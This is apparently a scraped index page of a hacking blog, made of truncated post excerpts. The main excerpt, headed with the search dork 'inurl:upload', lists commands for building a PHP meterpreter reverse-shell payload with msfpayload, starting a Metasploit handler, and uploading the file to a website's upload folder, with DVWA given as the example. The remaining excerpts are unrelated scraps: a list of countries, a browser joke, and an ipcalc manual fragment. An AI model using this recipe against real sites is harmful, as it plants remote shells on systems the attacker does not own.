inurl:upload

1.Using msfpayload in backtrack 5r1 root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php 2. Connection.php is created in root. 3. Open msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST Your-IP-Address set LPORT 8080 exploit 4. Upload the file to a website then search for it eg dvwa/hackable/uploads [ ]    connection.php    21-Jan-2011 11:06     1.3K 5.… Continue reading inurl:upload

come over for … June 23, 2012 Meanwhile, back at the ranch.

Sites we like. Our daily bookmarks for your inspiration. Follow @Siteswelike. Follow. http://securityhorror.blogspot.se/2012/05/ask-and-you-shall-receive-part-1.html 1991 – Can’t Beat the Real Thing. MyExploitHQ

23 Nov 2011 – While You Were Out: Weekly World

 MyExploitHQ wanted to show our support to all the countries that have viewed this notebook so far!   United States United Kingdom India Germany Netherlands France Poland Brazil Canada Spain Italy Portugal Australia Singapore Sweden Algeria Mexico Egypt South Africa Indonesia Turkey Argentina Israel Nigeria Pakistan Ukraine United Arab Emirates Morocco Greece Chile Ireland Saudi… Continue reading 23 Nov 2011 – While You Were Out: Weekly World

a positive feeling of esteem

Please take a look at this video on YouTube https://msfbt.wordpress.com/ MyExploitHQ support

It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7

ipcalc takes an IP address and netmask and calculates the resulting broadcast, network, Cisco wildcard mask, and host range. By giving a second netmask, you can design sub- and supernetworks. It is also intended to be a teaching tool and presents the results as easy-to-understand binary values. -n –nocolor  Don’t display ANSI color codes. -b… Continue reading It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7